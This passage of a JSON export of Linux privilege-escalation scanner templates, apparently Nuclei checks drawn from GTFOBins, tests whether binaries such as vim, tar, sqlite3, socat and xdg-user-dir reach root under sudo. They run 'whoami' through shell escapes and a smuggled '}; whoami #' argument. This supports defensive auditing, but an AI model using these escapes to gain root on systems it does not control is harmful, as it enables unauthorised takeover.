privesc-run-parts\n\ninfo:\n name: run-parts - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. 
The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.\n reference: https://gtfobins.github.io/gtfobins/run-parts/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,run-parts,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n run-parts --new-session --regex 'whoami' /bin\n\n - engine:\n - sh\n - bash\n source: |\n sudo run-parts --new-session --regex 'whoami' /bin\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950", "hash": "70c371c4d700bccfc0d4a1ecae1fe797", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c64" }, "name": "privesc-sash.yaml", "content": "id: privesc-sash\n\ninfo:\n name: sash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n sash is a stand-alone shell that is commonly used for system recovery and maintenance. It provides a minimal set of commands and features, making it useful in situations where the regular shell environment may not be available or functional. 
sash is often used in emergency situations to troubleshoot and repair systems.\n reference:\n - https://gtfobins.github.io/gtfobins/sash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,sash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo sash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ce3e0790fc0f2df9c854c0ebbea87101366fb71cb94b201e9cfe514944fd99a9022049f61f1295c5c558f823dce1676595bbc76b6231d4e119c8ac27fd97f13885f3:922c64590222798bb761d5b6d8e72950", "hash": "88a621e780b499228fd6f914b00b2f36", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c65" }, "name": "privesc-slsh.yaml", "content": "id: privesc-slsh\n\ninfo:\n name: slsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. 
slsh aims to provide a secure and restricted shell environment for executing commands.\n reference:\n - https://gtfobins.github.io/gtfobins/slsh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,slsh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n slsh -e 'system(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n sudo slsh -e 'system(\"whoami\")'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022054dcff275e626011ad92fcd8316cdd208fe284c043a239db0ffda2204d9fb1fa02202ac46ad85fa7cc9cabac22423ed101b80e6b0ce83b18ccb1c750aae936085e25:922c64590222798bb761d5b6d8e72950", "hash": "d535bb0db9279f9db66ce03542001c2b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c66" }, "name": "privesc-socat.yaml", "content": "id: privesc-socat\n\ninfo:\n name: Socat - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. It can be used for a wide range of networking tasks, such as file transfer, port forwarding, and network testing. 
Socat is known for its versatility and is often used for creating complex network connections and proxies.\n reference:\n - https://gtfobins.github.io/gtfobins/socat/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,socat,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n socat stdin exec:whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo socat stdin exec:whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a0048304602210099cc2474353834fa6a66ad77e870bc4f92f554d9f797223c6159ff031b3dfe1f022100c127110922ef2fac1198a268a26bc62c7407f4878efdb7a06614b6bd9eb72b9d:922c64590222798bb761d5b6d8e72950", "hash": "b6b39aece2a1cf9f89e36eb9684363f6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c67" }, "name": "privesc-softlimit.yaml", "content": "id: privesc-softlimit\n\ninfo:\n name: softlimit - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The softlimit command is used in conjunction with the daemontools software to set resource limits for a process. It is commonly used to control the resource usage of a process, such as limiting its memory or CPU usage. 
The softlimit command helps in managing and controlling the resource consumption of a process, which can be useful for ensuring system stability and preventing resource exhaustion.\n reference:\n - https://gtfobins.github.io/gtfobins/softlimit/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,softlimit,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n softlimit whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo softlimit whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100a04eb21179c92c0ad5a55f0bec1251c15dda9da6a4e7940675c13fdc1178a61c022100d43ab793bac3d766f256170d31c068295cb7a532d05bf5566af6b244fbc16be2:922c64590222798bb761d5b6d8e72950", "hash": "1b653e52262699e2ff81a8af256fc04d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c68" }, "name": "privesc-sqlite3.yaml", "content": "id: privesc-sqlite3\n\ninfo:\n name: sqlite3 - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n sqlite3 is a lightweight, self-contained, and serverless SQL database engine. 
It is widely used in embedded systems, mobile devices, and small to medium-sized applications.\n reference:\n - https://gtfobins.github.io/gtfobins/sqlite3/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,sqlite3,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sqlite3 /dev/null '.shell whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo sqlite3 /dev/null '.shell whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022022a00ad1518880dc881748fd331a8f7a3c599927934d342c7221c5ecccd445c1022100cff484fd929a67261efcef2917d8976308c8062ca11652d78b36b40c195c08aa:922c64590222798bb761d5b6d8e72950", "hash": "82ee4707ac4ba877adfe325db01bd278", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c69" }, "name": "privesc-ssh-agent.yaml", "content": "id: privesc-ssh-agent\n\ninfo:\n name: ssh-agent - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n ssh-agent is a program that helps manage and store private keys used for SSH authentication. 
It is often used to hold the decrypted private keys in memory, allowing for seamless authentication to remote servers without the need to re-enter passphrases for the keys.\n reference:\n - https://gtfobins.github.io/gtfobins/ssh-agent/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ssh-agent,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ssh-agent whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo ssh-agent whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a0048304602210097e3d63029818e5d2e81fda0c3087d89ee4eb8304ff3916d66fd3e55bbdf169e022100ed38e13697f09436a051297c35da6f03118ab07621ba25ddd959af7f2f954fb5:922c64590222798bb761d5b6d8e72950", "hash": "72ea417c0b1cbf3fc9b09dba86d9f01e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6a" }, "name": "privesc-sshpass.yaml", "content": "id: privesc-sshpass\n\ninfo:\n name: sshpass - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n sshpass is a command-line tool that provides a way to automatically input SSH passwords for password authentication. 
It is commonly used in scripts and automated processes where interactive password entry is not feasible.\n reference:\n - https://gtfobins.github.io/gtfobins/sshpass/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,sshpass,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sshpass whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo sshpass whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c9162852d30aaf04d1c07084230bd493a5785a7222866b7e4c249f4c384eaaf4022100db31e8c2e869ebda6aa552861701b090313dedfa33745a12bf57dacb15f1313c:922c64590222798bb761d5b6d8e72950", "hash": "6331d0dbc8dd0471c4be5ff8701346ef", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6b" }, "name": "privesc-stdbuf.yaml", "content": "id: privesc-stdbuf\n\ninfo:\n name: stdbuf - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The stdbuf command is used to modify the buffering operations of another command. 
It can be used to adjust the input/output buffering of a command, which can be useful for controlling the flow of data and improving the performance of certain operations.\n reference:\n - https://gtfobins.github.io/gtfobins/stdbuf/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,stdbuf,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n stdbuf -i0 whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo stdbuf -i0 whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022044c9d477bc49908bc0d4f73ddfe99855deac7b1000b8ebaf9f767ecc651da01602210089548a828bf5734329ae07791d0f488c2f5aa03715c28b85722fdcf48368c7e0:922c64590222798bb761d5b6d8e72950", "hash": "84092f7dae38301dfbb0d4f65e1fac83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6c" }, "name": "privesc-strace.yaml", "content": "id: privesc-strace\n\ninfo:\n name: strace - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n strace is a diagnostic, debugging, and instructional utility for Linux. 
It is used to monitor the system calls and signals that a program receives, allowing users to trace and analyze its interactions with the kernel.\n reference:\n - https://gtfobins.github.io/gtfobins/strace/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,strace,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n strace -o /dev/null whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo strace -o /dev/null whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950", "hash": "07d7ba4ef36e68c328aa9f1ed4c075bb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6d" }, "name": "privesc-tar.yaml", "content": "id: privesc-tar\n\ninfo:\n name: tar - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n tar is a command-line utility used to create and manipulate archive files. 
It is commonly used for bundling multiple files and directories into a single archive, often used in conjunction with compression tools like gzip or bzip2.\n reference:\n - https://gtfobins.github.io/gtfobins/tar/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,tar,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c505ccd3523d1185243180df012aa21eec0eb8062fe80bb508fe4ad53833ac4f022100c0478b121270a491ceea51d50c657ddc06b409067f7883554891c6698d51ab80:922c64590222798bb761d5b6d8e72950", "hash": "d0de2f07b54fd2ce449c1d881814da53", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6e" }, "name": "privesc-tcsh.yaml", "content": "id: privesc-tcsh\n\ninfo:\n name: tcsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n tcsh is a Unix shell based on and compatible with the C shell (csh). 
It provides a command-line interface for interacting with the operating system and executing commands.\n reference:\n - https://gtfobins.github.io/gtfobins/tcsh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,tcsh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n tcsh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo tcsh -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a004730450220149b0d0f5adce844377578aeda6fc48ac9871ef3341742a50dc21c1bacdfe614022100a2f0ad3b6b4557214228acc448e28537c82fbdc00a7aaf0636714cf7f42e625b:922c64590222798bb761d5b6d8e72950", "hash": "39b67ab52cb02adbbb0b8713b1d776c7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c6f" }, "name": "privesc-time.yaml", "content": "id: privesc-time\n\ninfo:\n name: Time - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The time command is used to determine the amount of time taken by a command to execute.\n reference:\n - https://gtfobins.github.io/gtfobins/time/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,time,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n time whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo time whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 
490a00463044022068aa7f9e01e7760a55ef866b4ba649e4281e569227d78fd3f56f1dbc5c28a06202204fb175df55a694a787172f84639d84d18b5c102dd12d852b54ee0161e82251cb:922c64590222798bb761d5b6d8e72950", "hash": "f106a5922a9d5d941edeee91e93e522f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c70" }, "name": "privesc-timeout.yaml", "content": "id: privesc-timeout\n\ninfo:\n name: Timeout - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The timeout command is used to run a command with a specified time limit. It is commonly used to prevent a command from running indefinitely and to enforce a time restriction on its execution.\n reference:\n - https://gtfobins.github.io/gtfobins/timeout/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,timeout,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n timeout 7d whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo timeout 7d whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022073e3ddb397099a5799b62affb115a9a23c353e96dea27b28e287229dc67e55a6022100a733860bfc6be7f5d2beef066d12158ad7117d237f9e1b2b3ca1a01cfeeab373:922c64590222798bb761d5b6d8e72950", "hash": "edc9e1323321c382a8d1f3f94316b191", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c71" }, "name": "privesc-tmate.yaml", "content": "id: privesc-tmate\n\ninfo:\n name: tmate - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n tmate is a terminal multiplexer that allows multiple users to access and collaborate in the same terminal session.\n reference:\n - https://gtfobins.github.io/gtfobins/tmate/\n metadata:\n verified: true\n max-request: 
3\n tags: code,linux,tmate,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n tmate -c whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo tmate -c whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100d7a22928033a826de562099c09867981c934c100f40a8f85b344621a09ad4183022100d31e45450871e72b3b83df9eae07facb93fa0ba422524875f57c02ba7c02fd22:922c64590222798bb761d5b6d8e72950", "hash": "392858209a5c7cb04ffbf9923002ccb8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c72" }, "name": "privesc-torify.yaml", "content": "id: privesc-torify\n\ninfo:\n name: Torify - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n torify is a command-line utility that is used to transparently route network traffic through the Tor network. 
It is commonly used to anonymize the network connections of other command-line programs, allowing them to communicate over the Tor network for enhanced privacy and security.\n reference:\n - https://gtfobins.github.io/gtfobins/torify/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,torify,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n torify whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo torify whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950", "hash": "5e1595c2b80414400a1124c536fb0855", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c73" }, "name": "privesc-torsocks.yaml", "content": "id: privesc-torsocks\n\ninfo:\n name: Torsocks - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n torsocks is a wrapper that enables the use of the Tor network for any program, including those that do not natively support proxy settings. 
It intercepts and redirects network calls from the target program through the Tor network, providing a way to anonymize the network traffic of various applications.\n reference:\n - https://gtfobins.github.io/gtfobins/torsocks/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,torsocks,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n torsocks whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo torsocks whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a004730450221009508b116a8d191c5652f0f02943050fa0c1ef20aa0c49c6e7b6ad79000fb62ea02205d89591a5d546bea451db17a3b0401ef437c788396431e8e28526f90e54ed07c:922c64590222798bb761d5b6d8e72950", "hash": "cdf645a75ce02a072a532e374b6517cc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c74" }, "name": "privesc-unshare.yaml", "content": "id: privesc-unshare\n\ninfo:\n name: Unshare - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The unshare command is used to run a command in a new namespace, which can isolate various aspects of the system, such as the mount namespace, network namespace, user namespace, and more.\n reference:\n - https://gtfobins.github.io/gtfobins/unshare/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,unshare,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n unshare whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo unshare whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 
'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221008089aba3a614ad70901d62d2611e3a01a42cb1d918eac6315a938c392890768f022100867c33eb6a50e6df63d5adfb3438ef308341581f474ebabe50624c470a77ad90:922c64590222798bb761d5b6d8e72950", "hash": "5faf635eda059a506a38b9ee93208932", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c75" }, "name": "privesc-vi.yaml", "content": "id: privesc-vi\n\ninfo:\n name: Vi - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n vi is a classic text editor in Unix and Unix-like operating systems. It is known for its modal editing capabilities and is often used for editing configuration files, scripts, and other text-based content in a terminal environment.\n reference:\n - https://gtfobins.github.io/gtfobins/vi/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,vi,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n vi -c '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo vi -c '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402203b4c6367774f4a6a195f7a1d884128f82a9a56209babeda7f9e3dd7d86b17a840220610ff4b54867dd54875c5830709819f89b5ac947821bf90200b49c561e1fd260:922c64590222798bb761d5b6d8e72950", "hash": "907b7139ff03804a0c66ff9435fbe099", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c76" }, "name": "privesc-view.yaml", "content": "id: privesc-view\n\ninfo:\n name: View - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n view is a command that is often associated with the vi text editor. 
When invoked as \"view,\" vi starts in read-only mode, allowing users to view files without the ability to modify them.\n reference:\n - https://gtfobins.github.io/gtfobins/view/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,view,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n view -c ':!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo view -c ':!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950", "hash": "6b5b64da3e9943654941d95aeba1df4f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c77" }, "name": "privesc-vim.yaml", "content": "id: privesc-vim\n\ninfo:\n name: Vim - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Vim is a highly configurable, modal text editor based on the vi editor.\n reference:\n - https://gtfobins.github.io/gtfobins/vim/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,vim,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n vim -c '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo vim -c '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 
490a00463044022049612d7d75c63ad4e467855595db3faaab56fa1534c82d09e285bf6ba7c4bbe602202e97df70026e66c37b68bf8fafe1742c4ad9d3dba438c61afb90148c61182761:922c64590222798bb761d5b6d8e72950", "hash": "7c002b674ab5ebe4386ab03b31c8c1c8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c78" }, "name": "privesc-xargs.yaml", "content": "id: privesc-xargs\n\ninfo:\n name: Xargs - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n xargs is a command in Unix and Unix-like operating systems used to build and execute command lines from standard input.\n reference:\n - https://gtfobins.github.io/gtfobins/xargs/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,xargs,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n xargs -a /dev/null whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo xargs -a /dev/null whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950", "hash": "1ed5ecedadaf7d67c8b9754dc3419a19", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c79" }, "name": "privesc-xdg-user-dir.yaml", "content": "id: privesc-xdg-user-dir\n\ninfo:\n name: xdg-user-dir - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The xdg-user-dir command is used to retrieve the path of a user's special directories, such as the user's home directory, desktop directory, download directory, and others, based on the XDG Base Directory Specification.\n reference:\n - 
https://gtfobins.github.io/gtfobins/xdg-user-dir/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,xdg-user-dir,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n xdg-user-dir '}; whoami #'\n\n - engine:\n - sh\n - bash\n source: |\n sudo xdg-user-dir '}; whoami #'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022052d790338c95d5a4f0c68b4a60843f3df6aac090487f194ecc148d85f94d76c802200a3645f26c4ddb25cd492038654121f410a284c9cbbd2f904ff4d9b104759046:922c64590222798bb761d5b6d8e72950", "hash": "c20d2a65d04c7e809166fb59c0fbdd5b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7a" }, "name": "privesc-yash.yaml", "content": "id: privesc-yash\n\ninfo:\n name: Yash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n yash is a POSIX-compliant command shell that aims to be a lightweight and efficient alternative to other shells such as Bash or Zsh.\n reference:\n - https://gtfobins.github.io/gtfobins/yash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,yash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n yash -c 'whoami'\n\n - engine:\n 